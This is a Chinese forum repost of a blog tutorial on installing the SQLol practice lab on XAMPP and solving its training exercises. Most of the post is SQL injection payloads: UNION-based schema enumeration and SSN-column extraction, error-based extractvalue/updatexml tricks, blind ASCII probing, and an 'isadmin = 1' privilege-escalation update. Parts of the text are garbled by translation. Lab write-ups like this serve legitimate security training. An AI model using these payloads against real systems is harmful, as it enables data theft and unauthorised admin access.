请选择 进入手机版 | 继续访问电脑版

搭建SQLo靶机与练习

[复制链接]
三兄弟沙发谢洪江 发表于 2020-12-31 20:26:26 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
SQLol安装
实验器材:Window 7 windows 2008
下载地址:http://github.com/SpiderLabs/MCIR
安装流程:
Window2008配置:
解压压缩包到网站根路径(比方,我新建一个sql目次,存放压缩包内容)
解压MCIR压缩包到c盘/xampp/htdocs/sql

打开c盘/xampp/htdocs/sql/sqlol/includes
/database.config.php 修改                              u                      s                      e                      r                      n                      a                      m                      e                      /                          username/               username/password等信息;

右击用vim编辑器打开编辑:

修改                              u                      s                      e                      r                      n                      a                      m                      e                      /                          username/               username/password等信息;

打开http://localhost/sql/,可以看到如下界面,点击RESET,即可完成数据库的安装。


出现Done搭建乐成:

返回如图使用:

选择输出效果:所有效果和没有错误信息


出现14个训练题:

0.训练:
’ or ‘1’=‘1

1.训练:
查找数据库
’ and 1=2 union select
concat_ws(char(32,58,32),user(),database(),
version()) #

查找表
’ and 1=2 union all select
TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘sqlol’; #

查找列
’ and 1=2 union select
COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘ssn’;#

显示所有字段
’ and 1=2 union select
concat_ws(char(32,58,32),name , ssn ) from ssn #

2.训练:
显示所有字段
1 and 1=2 union
select concat_ws(char(32,58,32),name , ssn) from ssn; #

3.训练
查找数据库
’ and 1=2 union select
concat_ws(char(32,58,32),user(),database(),version()) #

查找表
’ and 1=2 union all select
TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘sqlol’ LIMIT 1
OFFSET 1; #

查找列
’ and 1=2 union select
COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘ssn’; #

显示所有字段
’ and 1=2 union select
concat_ws(char(32,58,32),name , ssn ) from ssn LIMIT 1 OFFSET 1 #

4.训练
查找数据库
’ and (extractvalue(1,
concat(0x7e,(select concat_ws(char(32,58,32),user(),database()))))) and ‘1’=‘1
给堕落误信息分析:

显示所有字段
’ and (extractvalue(1, concat(0x7e,(select
concat_ws(char(32,58,32),name , ssn ) from ssn LIMIT 1 OFFSET 1)))) and ‘1’=‘1 #

5.盲注训练
’ or ascii(substring((select
user()),1,1)) = 111#
(1)无反馈:

(2)从111试到了114出来了效果:(111-114是对应ASSIC表中
小写字母o-r)
’ or ascii(substring((select
user()),1,1)) = 114#

6-7.训练:
’ or
updatexml(0,concat(0x01,(SELECT concat(name,’ ‘,ssn) FROM ssn limit 0,1)),0) #

.训练:
’ uNion seLect
concat(name,’:’,ssn) from ssn uNion selEct null from users whEre
username=’

9.训练
admin’, isadmin = 1 WHERE id = 3#

10.训练
concat(name,’:’,ssn) from ssn#

11.训练

12.训练:
1’ and #>
脚本已注入数据库,每次都会弹窗。

13.训练
chuNk mACRUnFast%
通过编写脚本或使用 SQLMAP 举行猜测盘算,当猜测正确的时候返回
值是“Got results!”(因为 Python编程与 SQLMAP)

改了显示信息栏显示的效果:


来源:https://blog.csdn.net/weixin_51167520/article/details/111991991
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


专注素材教程免费分享
全国免费热线电话

18768367769

周一至周日9:00-23:00

反馈建议

27428564@qq.com 在线QQ咨询

扫描二维码关注我们

Powered by Discuz! X3.4© 2001-2013 Comsenz Inc.( 蜀ICP备2021001884号-1 )